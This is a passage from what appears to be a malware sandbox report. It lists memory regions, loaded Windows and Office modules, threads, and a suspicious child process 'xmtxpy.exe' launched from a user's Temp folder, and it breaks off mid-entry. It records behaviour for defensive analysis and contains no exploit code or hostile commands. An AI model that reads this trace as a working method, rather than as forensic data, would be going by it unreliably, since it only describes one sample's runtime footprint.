"appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 1196 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1197 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1198 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1199 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1200 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1201 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1202 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1203 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1204 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1205 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1206 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1207 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1208 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1209 start_va = 0x75690000 end_va = 0x76a8efff monitored = 0 entry_point = 0x7584b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1210 start_va = 0x76a90000 end_va = 0x76ac6fff monitored = 0 entry_point = 0x76a93b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1211 start_va = 0x76e20000 end_va = 0x77318fff monitored = 0 entry_point = 0x77027610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1212 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1213 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1214 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1215 start_va = 0x775e0000 end_va = 0x7766cfff monitored = 0 entry_point = 0x77629b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1216 start_va = 0x74e20000 end_va = 0x74e63fff monitored = 0 entry_point = 0x74e27410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1217 start_va = 0x77670000 end_va = 0x7767efff monitored = 0 entry_point = 0x77672e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1219 start_va = 0x6cbe0000 end_va = 0x6cc44fff monitored = 0 entry_point = 0x6cbffa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 1220 start_va = 0x74ad0000 end_va = 0x74bbafff monitored = 0 entry_point = 0x74b0d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1221 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1222 start_va = 0x6cb10000 end_va = 0x6cbdafff monitored = 0 entry_point = 0x6cb26a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 1223 start_va = 0x70950000 end_va = 0x70968fff monitored = 0 entry_point = 0x709547e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1224 start_va = 0x688a0000 end_va = 0x68931fff monitored = 0 entry_point = 0x688add60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 1225 start_va = 0x5d0000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1226 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1227 start_va = 0x5d0000 end_va = 0x5f9fff monitored = 0 entry_point = 0x5d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1228 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1229 start_va = 0x8c0000 end_va = 0xa47fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 1231 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1232 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1233 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1234 start_va = 0xa50000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 1235 start_va = 0xbe0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 1236 start_va = 0x1fe0000 end_va = 0x2070fff monitored = 0 entry_point = 0x2018cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1246 start_va = 0x1fe0000 end_va = 0x2316fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1248 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1270 start_va = 0x5d0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 1271 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 1273 start_va = 0x74d80000 end_va = 0x74e11fff monitored = 0 entry_point = 0x74db8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1278 start_va = 0x2320000 end_va = 0x249ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 1279 start_va = 0x24a0000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 1280 start_va = 0x2680000 end_va = 0x2a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 1281 start_va = 0x698f0000 end_va = 0x69c78fff monitored = 0 entry_point = 0x6998cc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 1282 start_va = 0x560000 end_va = 0x561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1283 start_va = 0x74560000 end_va = 0x7457afff monitored = 0 entry_point = 0x74569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1287 start_va = 0x6f4a0000 end_va = 0x6f6aefff monitored = 0 entry_point = 0x6f54b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 1288 start_va = 0x570000 end_va = 0x570fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1289 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1299 start_va = 0x3de20000 end_va = 0x3de2dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 1300 start_va = 0x70970000 end_va = 0x709e4fff monitored = 0 entry_point = 0x709a9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1301 start_va = 0x24a0000 end_va = 0x266ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 1302 start_va = 0x2670000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 1317 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1318 start_va = 0x75220000 end_va = 0x752a3fff monitored = 0 entry_point = 0x75246220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1342 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1343 start_va = 0x610000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 1344 start_va = 0x670000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1345 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1346 start_va = 0x2320000 end_va = 0x241ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 1347 start_va = 0x2490000 end_va = 0x249ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 1348 start_va = 0x24a0000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 1349 start_va = 0x2660000 end_va = 0x266ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 1350 start_va = 0x74c60000 end_va = 0x74d7efff monitored = 0 entry_point = 0x74ca5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1355 start_va = 0x25a0000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 1356 start_va = 0x590000 end_va = 0x594fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 1357 start_va = 0x650000 end_va = 0x651fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 1358 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 1359 start_va = 0x2420000 end_va = 0x242ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 1389 start_va = 0x2430000 end_va = 0x246ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 1390 start_va = 0x2470000 end_va = 0x2470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002470000" filename = "" Region: id = 1391 start_va = 0x2a80000 end_va = 0x2b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 1395 start_va = 0x2b80000 end_va = 0x2c3bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b80000" filename = "" Region: id = 1396 start_va = 0x2470000 end_va = 0x2473fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002470000" filename = "" Region: id = 1397 start_va = 0x6f3d0000 end_va = 0x6f3ecfff monitored = 0 entry_point = 0x6f3d3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1398 start_va = 0x2480000 end_va = 0x2483fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 1399 start_va = 0x2620000 end_va = 0x2620fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002620000" filename = "" Region: id = 1400 start_va = 0x2c40000 end_va = 0x3131fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c40000" filename = "" Region: id = 1401 start_va = 0x3140000 end_va = 0x417ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1404 start_va = 0x2630000 end_va = 0x2634fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 1452 start_va = 0x69720000 end_va = 0x69768fff monitored = 0 entry_point = 0x69726450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 1453 start_va = 0x2640000 end_va = 0x2646fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ole32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\ole32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ole32.dll.mui") Region: id = 1456 start_va = 0x2c40000 end_va = 0x2d1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Thread: id = 48 os_tid = 0x10ac Thread: id = 52 os_tid = 0x1208 Thread: id = 57 os_tid = 0x1228 Thread: id = 58 os_tid = 0x123c Thread: id = 59 os_tid = 0x1240 Thread: id = 60 os_tid = 0x1244 Thread: id = 64 os_tid = 0x1228 Process: id = "6" image_name = "xmtxpy.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xmtxpy.exe" page_root = "0x1ac61000" os_pid = "0x120c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x6f0" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1250 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1251 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1252 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1253 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1254 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1255 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1256 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1257 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1258 start_va = 0x10d0000 end_va = 0x10f3fff monitored = 1 entry_point = 0x10de9d7 region_type = mapped_file name = "xmtxpy.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xmtxpy.exe") Region: id = 1259 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1260 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1261 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1262 start_va = 0x7fff0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1263 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1264 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 1267 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1284 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1285 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1286 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1290 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1291 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1292 start_va = 0x4a0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1293 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1294 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1295 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1296 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1297 start_va = 0x5d0000 end_va = 0x68dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1298 start_va = 0x74810000 end_va = 0x748a1fff monitored = 0 entry_point = 0x74850380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1304 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1305 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1306 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1307 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1308 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1309 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1310 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1311 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1312 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1313 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1314 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1315 start_va = 0x679d0000 end_va = 0x679f3fff monitored = 0 entry_point = 0x679d4820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 1316 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1319 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1320 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1321 start_va = 0x67ca0000 end_va = 0x67cbbfff monitored = 0 entry_point = 0x67cb5300 region_type = mapped_file name = "avifil32.dll" filename = "\\Windows\\SysWOW64\\avifil32.dll" (normalized: "c:\\windows\\syswow64\\avifil32.dll") Region: id = 1322 start_va = 0x67c70000 end_va = 0x67c92fff monitored = 0 entry_point = 0x67c833e0 region_type = mapped_file name = "msvfw32.dll" filename = "\\Windows\\SysWOW64\\msvfw32.dll" (normalized: "c:\\windows\\syswow64\\msvfw32.dll") Region: id = 1324 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1325 start_va = 